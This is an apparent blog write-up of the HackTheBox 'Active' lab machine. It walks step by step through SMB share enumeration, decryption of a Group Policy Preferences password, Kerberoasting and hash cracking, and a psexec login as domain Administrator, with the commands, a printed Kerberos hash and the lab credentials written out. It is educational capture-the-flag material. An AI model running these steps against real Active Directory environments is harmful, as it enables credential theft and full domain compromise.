HTB - Active

HTB – Active

In this walk through, we will be going through the Active room from HackTheBox. This room is rated as Easy on the platform and it consists of Active Directory Enumeration, GPP Credential Attacks and Kerberoasting to get root. So, let’s get started without any delay.

Active

Machine Info:

TitleActive
IPaddress10.10.10.100
DifficultyEasy
OSWindows
DescriptionActive is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.

Enumeration:

  • I started off with an Aggressive nmap scan and found many ports opened as expected from a Windows box. The highlight here was port 88 (Kereberos) confirming that we are dealing with an Active Directory environment here. Next, the major ones were 139 and 445 (SMB). Other to look for are – 135 (RPC), 3268 (LDAP). I checked for WinRM separately at port 5985 but found it to be closed.

$ sudo nmap -A 10.10.10.100
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-04 21:43 IST

Nmap scan report for 10.10.10.100
Host is up (0.25s latency).
Not shown: 982 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    filtered domain
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-04 16:14:17Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     tcpwrapped
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     unknown
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     unknown
49165/tcp open     msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/4%OT=88%CT=1%CU=31064%PV=Y%DS=2%DC=T%G=Y%TM=656DFBB
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=2%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=107%GCD=1%ISR=10E%TI=RD%CI=I%II=I%TS=9)OPS(O1=M54DNW8ST11%O2=M5
OS:4DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(
OS:W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000
OS:%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-04T16:15:32
|_  start_date: 2023-12-04T15:45:49

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   240.33 ms 10.10.14.1
2   240.48 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.91 seconds

nmap scan

  • Tried to enumerate using RPC and LDAP services but found no luck.

enumerating RPC and LDAP

  • Next, i pivoted to SMB. List the shares using Smbclient and used Smbmap to check the permissions. Found a READ access on “Replication” Share.

smbclient -L 10.10.10.100

SMB Enumeration

smbmap -H 10.10.10.100

Smbmap output

  • Moving on, used smbclient and downloaded all the files recursively in the Replication Share. The key highlight here was the Groups.XML file which might be susceptible to GPP cpassword leak or MS14-025. Let’s check.

$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\wh1terose]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (1.8 KiloBytes/sec) (average 0.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.5 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.1 KiloBytes/sec) (average 0.7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.8 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \> exit

Exploitation & Getting root:

GPP Credential Attack:

Connecting to the Replication Share

Found Groups.xml

  • Checked inside the groups.xml file and got the cpassword encrypted value of user SVC_TGS. We are lucky that we can easily decrypt as the key is already known in the public.

downloaded groups.xml

found GPP password

  • I used the gpp-decrypt tool that is already installed in Kali to decrypt the cpassword encrypted value and got the password for user SVC_TGS – GPPstillStandingStrong2k18.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

GPP password cracked

Getting Access with Kerberoasting:

  • With the user password, i tried to get a shell however was unable to to do. So, i turned to Kerberosating. Used the GetUserSPNs tool to dump the Service account hash. Here the Service account is “Administrator”.

$ GetUserSPNs.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2023-12-04 21:16:47.032136             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ecde520a57beabaac2e907c76f0143d9$2faa288314a5794cf788e264c0513c2e05c5a481d364239a028e5013f18088d46ae0eb2d8211faa102db9fb5f701e77a5aad349c84aea05074f335e9324b19ece4a665325979b7b077db98aebd90e67e7cb798dde3c397f8704b9c02effcfc802b31dc1eb06f64b6f241b5350a6b8695fff28fb824c80124817436d12554d763ecc4dbf041cbba4eff79ba82f862a66e5d06ac7ddbbd641635a385d0d7a5d20b85727eb4b246d1c0dd2c22faa17098ee9f77de717808d6643b10ddcb77675741044a24d48ec549e25c190b702d565b38b211ad4a0d6d5f7663925a8dd9958a2214f88e9993b7e0c11e894951a960c709d41f99c4932eca9d700f96f73e40b5cd7becef53d0acae393842acbf164e9a65a42a2ce1b782bb1f621124abd120f84f4292216cca756b2dbeac656ebe9fd3147638f777cda79b9b1c25325c6c1c1e2ee0bfa99a9c1b37838385648431fd8300304131b75fc9f40c085d0d15929e4e931ee028a5e4901397d20a87c0f8b441e5a1c88ef73d67ccc97fe1573e4ec242770793e0dc5cc8de035ded231cc741ad95ed3c2c7be84de6b2dc9c353a34034cd3518659fe2342411e337fc0ac96df0e94212386370d8ea340eb8a565ea237d51cbf31ae3276ae32a2d97f8689d97ddebc4a1ac9b9e84fd475d1b6eeb7731b24849e0508088ae6506d9b01ccc071c49aba2cf4f4aec1a64c4502786dcfff2d624db3bc027fc5f71f93315ced5dae5df9d1bf99a40a43149f9cec11cad25e75d1da0d26365823056176f09a33d1826579fabab378b0c966db27153c40951c31a6415e5ae26ff5390a79aeabaf9e204a6664bd13b6411143f80e33b3524cb8593ecb7f9f45f3733d9c80237a33cd261e9a768432472927c64f18f2e5de6f031456a8126eed6be9f588412101d0662289cbdd641ad8e437a20f74dc5001bf14f44ae3d91d77be57b9dba858b05297176ebff0e8645699222c289fbf0f3a2443ac1c4b7d223c6658ad462faa312470cd1cabab9527d9befd4ab5f660a05e972af3166a64963b2421db5210a336f9e3e9a9942d8e28c85f1663df07abc51b95bea73f5b0bc79f88b48c0ddac25ba481c3a361e371fea10321f3922cb6f7f47a3fa2d62d663f0d7729abc8c203201159ee27195c1e5746a60233c8399bc9a661d5fb722ceaeea9cb81ba2d2ea830d793bd3984bfddc087848897c8bf59cc649b1a0402b0b97b819a8bfda52d97a1ed16fc82a9cb034059055e11c7205dc1

  • Cracked the hash using hashcat and found the password – Ticketmaster1968.

hashcat -m 13100 hash.txt rockyou.txt -O

Hash via Kerberoasting

  • Next, i sprayed the password on the target IP using crackmapexec and the result shows “Pw3nd!”.

crackmapexec smb 10.10.10.100 -u Administrator -d active.htb -p Ticketmaster1968

Sprayed password using crackmapexec

  • At last, used PsExec to get the shell access on the DC as Administrator.

psexec.py active.htb/Administrator:'Ticketmaster1968'@10.10.10.100

Got root

  • Captured both the flags and completed the room.

user flag

root flag

Machine completed

Also Read: HTB – Busqueda

Conclusion:

Conclusion

So that was “Active” for you. We started off with our regular nmap scan and found multiple ports opened. Enumerated the SMB service and found groups.xml file in the Replication share. The file contained the GPP password of SVC_TGS user. Cracked it and then performed Kerberoasting with that. Got Administrator service account hash using that and then cracked it to get the plain text password. At last, using the password logged into the DC as Administrator and captured both user and root flags. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top